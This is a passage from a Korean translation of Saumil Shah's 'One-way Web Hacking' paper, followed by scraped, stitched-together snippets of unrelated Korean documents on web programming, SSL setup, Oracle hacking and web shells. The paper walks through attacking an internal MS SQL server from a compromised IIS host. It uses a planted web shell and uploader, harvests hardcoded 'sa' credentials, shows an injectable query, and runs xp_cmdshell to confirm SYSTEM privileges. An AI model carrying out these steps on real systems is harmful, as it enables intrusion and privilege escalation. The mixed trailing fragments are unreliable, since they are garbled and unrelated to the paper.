데이터베이스사용자와패스워드는손상된웹서버의어플리케이션소스코드와호스트된설정파일을조사함으로써발견된다. Query String: 데이터베이스에보내고실행되는 SQL 쿼리. 다른두개의파라미터 Driver 와 Connection String 은데이터베이스에대해적절한 driver 와경로를선택하는데사용된다. Connection String 파라미터는선택사항이다. sqlquery.asp 에서, 우리는 driver 4 개, 즉 Microsoft SQL 서버, ODBC 를통한 Oracle, ODBC 를통한 MySQL 그리고 Foxpro 를통한연결옵션이있다. driver 를더추가하는건매우쉽다. sqlquery.asp 에대한소스코드는여기에서구할수있다. PHP, Perl, JSP 등과같은언어로웹기반 SQL 명령프롬프트처럼만드는것이가능하다.

23 (Thanks to Ketan Vyas for sqlquery.asp) 7.2 An example - IIS and MS SQL server 이제 sqlquery.asp 를이용해서내부네트워크에있는데이터베이스서버를어떻게해킹하는지시나리오를보여준다. 아래그림은 www1.example.com 웹서버와데이터베이스서버 의어플리케이션계층을보여준다. www1.example.com 이이미손상되었고웹기반파일업로더 (upload.asp) 와웹기반명령프롬프트 (cmdasp.asp) 가심어져있다고가정한다. 권한상승에대해선가정하지않는다. www1.example.com 에 sqlquery.asp 를업로드하고 에있는데이터베이스서버를공격하는데사용할것이다. 7.3 Uploading sqlquery.asp 아래의스크린샷은 sqlquery.asp 가 www1.example.com 에파일업로더 (upload.asp) 에의해업로드되고있는걸보여준다. 7.4 Pilfering the web application

24 back-end 데이터베이스에연결하기전에, 어떻게데이터베이스에연결이되는지와무슨자격이있는지알아야한다. www1.example.com 에서호스트된웹어플리케이션의소스코드를조사하자마자, 다음라인이발견된다. Set Con = Server.CreateObject("ADODB.Connection") Con.Open "Provider=SQLOLEDB; Data Source= ; Initial Catalog=art; User Id=sa; Password=sys+adm!n" Set RS = Con.Execute("select StockNumber,Name,Description,Artist, ListPrice,image from PRODUCTS where ID = " + Request.QueryString("ID")) 어플리케이션소스코드의이라인은 에있는 back-end 데이터베이스서버에연결할충분한정보를우리에게알려준다. 7.5 Executing SQL queries via sqlquery.asp 위의 sqlquery.asp 를사용하여, 데이터베이스서버에서임의의 SQL 명령문을실행하는것이가능하다. 아래의스크린샷은 "SELECT * FROM SYSDATABASES;" 쿼리의결과를보여준다. 다음스크린샷은어플리케이션데이터가 "art" 데이터베이스에서호스트된 PRODUCTS 테이블의출력을보여준다.

25 7.6 Executing stored procedures 또한 SQL 명령프롬프트는저장프로시져를실행하는데사용될수있다. 예를들어, 시스템관리자 (sa) 권한을사용하는 back-end 데이터베이스를접근할것이다. 그결과데이터베이스에있는임의의명령을실행하기위해 "xp_cmdshell" 과같은저장프로시져를실행하는것이가능하다. 아래의스크린샷은 "xp_cmdshell" 저장프로시져를사용하여데이터베이스에서 "ipconfig" 명령을실행하는걸보여준다.

26 외부에서접근할수없는내부서버에원격명령을실행시켰다. 사실, 이와같은예제로권한상승또한가능하다. 왜냐하면시스템관리자권한을사용하여데이터베이스에접근할수있기때문이다. "whoami.exe" 을실행시킴으로써우리가얻은권한을보여준다.

27 위의스크린샷은 "NT_AUTHORITY\SYSTEM" 사용자인관리자권한을확실히가졌음을증명한다. 8.0 Concluding thoughts one-way 해킹은방화벽이웹어플리케이션을보호하는데충분치않다는사실을설명한다. 견고한방화벽은공격을힘들게할순있지만공격자의모든방법을막을순없다. 사실파일업로더, 웹기반명령프롬프트, 웹기반 SQL 명령프롬프트같은툴이있으면웹어플리케이션과그밑에있는네트워크를공격하기쉽다. 어플리케이션을보호하는시각의관점에서 SSL 은더나쁘다. 많은사람들은 SSL 이그런공격들을보호해준다고생각한다. 그렇지는않다. 단지 SSL 은도청을방지하기위해웹브라우저와웹서버사이의데이터를암호화할뿐이다. SSL 은웹어플리케이션과그밑에있는네트워크에보안을제공하지않는다. 모든 one-way 해킹은 OpenSSL 같은라이브러리를사용함으로써 SSL 에쉽게적용될수있다. 9.0 References 1. Web Hacking: Attacks and Defense - Saumil Shah, Shreeraj Shah, Stuart McClure, Addison Wesley, Inside-Out Attacks - Patrick Heim, Saumil Shah, Forms in HTML documents - multipart/form-data - from 4. RFC Form-based File Upload in HTML 5. Microsoft IIS 5.0 In-Process Table Privilege Elevation Vulnerability 6. Linux Ptrace/Setuid Exec Vulnerability 7. Securiteam - Ptrace Exploit Code 8. SSL - a false sense of security by Chris Prosise and Saumil Shah one way 2004 net-square

내용 1.0 도입 1.1 일반적인웹어플리케이션시스템의구성요소들 1.2 웹어플리케이션시스템에대한 URL 맵핑 2.0 one-way web 해킹에대한순서도 3.0 엔트리포인터찾기 URL 파싱공격 안전하지않은입력파라미터공격 SQL inject

내용 1.0 도입 1.1 일반적인웹어플리케이션시스템의구성요소들 1.2 웹어플리케이션시스템에대한 URL 맵핑 2.0 one-way web 해킹에대한순서도 3.0 엔트리포인터찾기 URL 파싱공격 안전하지않은입력파라미터공격 SQL inject One-way Web Hacking Saumil Shah saumil@net-square.com 8th December, 2003 "Necessity is the mother of invention" 편역 : poc@securityproof.net E-mail: progressfree@hotmail.com * 다소오래된글이지만웹해킹공부에많은도움이될것으로생각합니다.

More information

2009년 상반기 사업계획

2009년 상반기 사업계획 웹 (WWW) 쉽게배우는데이터통신과컴퓨터네트워크 학습목표 웹서비스를위한클라이언트 - 서버구조를살펴본다. 웹서비스를지원하는 APM(Apache, PHP, MySQL) 의연동방식을이해한다. HTML 이지원하는기본태그명령어와프레임구조를이해한다. HTTP 의요청 / 응답메시지의구조와동작원리를이해한다. CGI 의원리를이해하고 FORM 태그로사용자입력을처리하는방식을알아본다.

More information

The Pocket Guide to TCP/IP Sockets: C Version

The Pocket Guide to  TCP/IP Sockets: C Version 인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,

More information

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher( 실행할페이지.jsp); 다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 chapter 3. 기본웹해킹 1. 정보수집 해커들이웹사이트를해킹하기위해대상시스템의운영체제나어플리케이션버전등과같은대상시스템의정보를수집하는것을의미한다. -2- 일반적인해킹단계 정보수집 취약점분석 실제공격 사후처리 웹스캔포트스캔 Application 종류, 버전 OS종류, 버전등등 OS종류, 버전취약점 Application 취약점 리모트어택웹, DB, SQL injection,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 WEB SERVER PORTING 1 Jo, Heeseung 웹서버포팅 HBE-SM5-S4210 를임베디드웹서버로사용할수있도록웹서버를올리는작업 임베디드서버에널리쓰이는웹서버들중 GoAhead 라는웹서버를포팅 CGI 프로그램을이용하여웹에서 HBE-SM5-S4210 의 LED, 7- Segment, TextLCD 를제어실습 2 Goahead webserver 소스를다운받거나제공된

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리

More information

Adobe Flash 취약점 분석 (CVE-2012-0754)

Adobe Flash 취약점 분석 (CVE-2012-0754) 기술문서 14. 08. 13. 작성 GNU C library dynamic linker $ORIGIN expansion Vulnerability Author : E-Mail : 윤지환 131ackcon@gmail.com Abstract 2010 년 Tavis Ormandy 에 의해 발견된 취약점으로써 정확한 명칭은 GNU C library dynamic linker

More information

0. 들어가기 전

0. 들어가기 전 컴퓨터네트워크 14 장. 웹 (WWW) (3) - HTTP 1 이번시간의학습목표 HTTP 의요청 / 응답메시지의구조와동작원리이해 2 요청과응답 (1) HTTP (HyperText Transfer Protocol) 웹브라우저는 URL 을이용원하는자원표현 HTTP 메소드 (method) 를이용하여데이터를요청 (GET) 하거나, 회신 (POST) 요청과응답 요청

More information

BEA_WebLogic.hwp

BEA_WebLogic.hwp BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법

More information

Microsoft PowerPoint - comp_prac_081223_2.pptx

Microsoft PowerPoint - comp_prac_081223_2.pptx Computer Programming Practice (2008 Winter) Practice 2 기본 Unix/Linux 명령어숙지 2008. 12. 23 Contents Linux commands Basic commands File and Directory User Data Filtering Process Etc Conclusion & Recommended

More information

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서 커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드

More information

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인 스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

untitled

untitled 웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는

More information

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,

More information

Microsoft PowerPoint UNIX Shell.ppt

Microsoft PowerPoint UNIX Shell.ppt 컴퓨터특강 () 2006 년봄학기 문양세강원대학교컴퓨터과학과 Shell? Shell이란명령어해석기 (Command Processor or Command Interpreter): 사용자가입력하는명령을읽고해석하는프로그램프로그래밍언어 : Shell이해석할수있는스크립트 (shell script) 라는프로그램을작성유닉스를사용하는데있어주요한인터페이스 Page 2 1 Shell

More information

1217 WebTrafMon II

1217 WebTrafMon II (1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network

More information

chapter1,2.doc

chapter1,2.doc JavaServer Pages Version 08-alpha copyright2001 B l u e N o t e all rights reserved http://jspboolpaecom vesion08-alpha, UML (?) part1part2 Part1 part2 part1 JSP Chapter2 ( ) Part 1 chapter 1 JavaServer

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port

More information

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. 기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는

More information

Microsoft PowerPoint UNIX Shell.pptx

Microsoft PowerPoint UNIX Shell.pptx UNIX SHELL 문양세강원대학교 IT 특성화대학컴퓨터과학전공 Shell? Shell 이란명령어해석기 (Command Processor or Command Interpreter): 사용자가입력하는명령을읽고해석하는프로그램 프로그래밍언어 : Shell 이해석할수있는스크립트 (shell script) 라는프로그램을작성 유닉스를사용하는데있어주요한인터페이스 Page

More information

<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770>

<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770> 기술문서 08. 10. 25. 작성 PHP 기반웹쉘의동작원리와공개웹쉘의기능분석및대응방안 작성자 : 동명대학교 THINK 정정홍 (zeratul621@naver.com) 1. 시작하면서 p. 2 2. 웹쉘의동작원리 p. 3 3. r57shell p. 5 4. kcwebtelnet p. 9 5. phpremoteview p. 10 6. 웹쉘대응방안 p. 12 동명대학교정보보호동아리

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc Asp Mssql Sql Injection Tool 분석보고서 이재곤 (x0saver@gmail.com) SK Infosec Co., Inc MSS 사업본부 / 침해대응센터모의해킹파트 Table of Contents 1. 개요... 3 2. 구성... 3 3. 분석... 4 3.1. 기능분석... 4 4. 공격원리...14 4.1 기본공격원리...14 4.2

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

제목 레이아웃

제목 레이아웃 웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya

More information

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

슬라이드 1

슬라이드 1 쇼핑몰, 딥줌그리고 Azure Doubleguy 이철성 Forbiz 싞훈식 Overview 기존서비스들의고민 클라우드의장점 Windows.Azure.com 의사용방법 PHP Azure SDK 사용방법 ( 이클립스를이용한 ) PHP Azure Command Prompt 를이용한패키징 상호연동데모 DeepZoom Composing Services 실버라이트딥줌타일이미지생성서버혹은서비스

More information

Remote UI Guide

Remote UI Guide Remote UI KOR Remote UI Remote UI PDF Adobe Reader/Adobe Acrobat Reader. Adobe Reader/Adobe Acrobat Reader Adobe Systems Incorporated.. Canon. Remote UI GIF Adobe Systems Incorporated Photoshop. ..........................................................

More information

쉽게 풀어쓴 C 프로그래밊

쉽게 풀어쓴 C 프로그래밊 Power Java 제 27 장데이터베이스 프로그래밍 이번장에서학습할내용 자바와데이터베이스 데이터베이스의기초 SQL JDBC 를이용한프로그래밍 변경가능한결과집합 자바를통하여데이터베이스를사용하는방법을학습합니다. 자바와데이터베이스 JDBC(Java Database Connectivity) 는자바 API 의하나로서데이터베이스에연결하여서데이터베이스안의데이터에대하여검색하고데이터를변경할수있게한다.

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù 21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132

More information

초보자를 위한 ADO 21일 완성

초보자를 위한 ADO 21일 완성 ADO 21, 21 Sams Teach Yourself ADO 2.5 in 21 Days., 21., 2 1 ADO., ADO.? ADO 21 (VB, VBA, VB ), ADO. 3 (Week). 1, 2, COM+ 3.. HTML,. 3 (week), ADO. 24 1 - ADO OLE DB SQL, UDA(Universal Data Access) ADO.,,

More information

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments

More information

JSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른

JSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른 JSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른 URL로바꿀수있다. 예 ) response.sendredirect("http://www.paran.com");

More information

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F31C2F7BDC32E >

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F31C2F7BDC32E > Chapter 8 데이터베이스응용개발 목차 사용자인터페이스와도구들 웹인터페이스와데이터베이스 웹기초 Servlet 과 JSP 대규모웹응용개발 ASP.Net 8 장. 데이터베이스응용개발 (Page 1) 1. 사용자인터페이스와도구들 대부분의데이터베이스사용자들은 SQL을사용하지않음 응용프로그램 : 사용자와데이터베이스를연결 데이터베이스응용의구조 Front-end Middle

More information

Microsoft PowerPoint - 10Àå.ppt

Microsoft PowerPoint - 10Àå.ppt 10 장. DB 서버구축및운영 DBMS 의개념과용어를익힌다. 간단한 SQL 문법을학습한다. MySQL 서버를설치 / 운영한다. 관련용어 데이터 : 자료 테이블 : 데이터를표형식으로표현 레코드 : 테이블의행 필드또는컬럼 : 테이블의열 필드명 : 각필드의이름 데이터타입 : 각필드에입력할값의형식 학번이름주소연락처 관련용어 DB : 테이블의집합 DBMS : DB 들을관리하는소프트웨어

More information

PowerPoint Template

PowerPoint Template JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것

More information

TCP/IP Model

TCP/IP Model Servlet HTTP Connection & Tomcat Server 숙명여자대학교 _ 멀티미디어과학과 2012 년여름학기 윤용익 yiyoon@sm.ac.kr 2012 Web Program Language Web page 작성용언어 CGI 와서블릿 CGI(Common Gateway Interface) 웹사이트에서방명록, 게시판을작성하기위해서는 HTML 문서와함께방명록이나게시판을위한프로그램도작성해야하는데이프로그램은

More information

10 강. 쉘스크립트 l 쉘스크립트 Ÿ 쉘은명령어들을연속적으로실행하는인터프리터환경을제공 Ÿ 쉘스크립트는제어문과변수선언등이가능하며프로그래밍언어와유사 Ÿ 프로그래밍언어와스크립트언어 -프로그래밍언어를사용하는경우소스코드를컴파일하여실행가능한파일로만들어야함 -일반적으로실행파일은다

10 강. 쉘스크립트 l 쉘스크립트 Ÿ 쉘은명령어들을연속적으로실행하는인터프리터환경을제공 Ÿ 쉘스크립트는제어문과변수선언등이가능하며프로그래밍언어와유사 Ÿ 프로그래밍언어와스크립트언어 -프로그래밍언어를사용하는경우소스코드를컴파일하여실행가능한파일로만들어야함 -일반적으로실행파일은다 10 강. 쉘스크립트 쉘스크립트 쉘은명령어들을연속적으로실행하는인터프리터환경을제공 쉘스크립트는제어문과변수선언등이가능하며프로그래밍언어와유사 프로그래밍언어와스크립트언어 -프로그래밍언어를사용하는경우소스코드를컴파일하여실행가능한파일로만들어야함 -일반적으로실행파일은다른운영체제로이식되지않음 -스크립트언어를사용하면컴파일과정이없고인터프리터가소스파일에서명령문을판독하여각각의명령을수행

More information

Cloud Friendly System Architecture

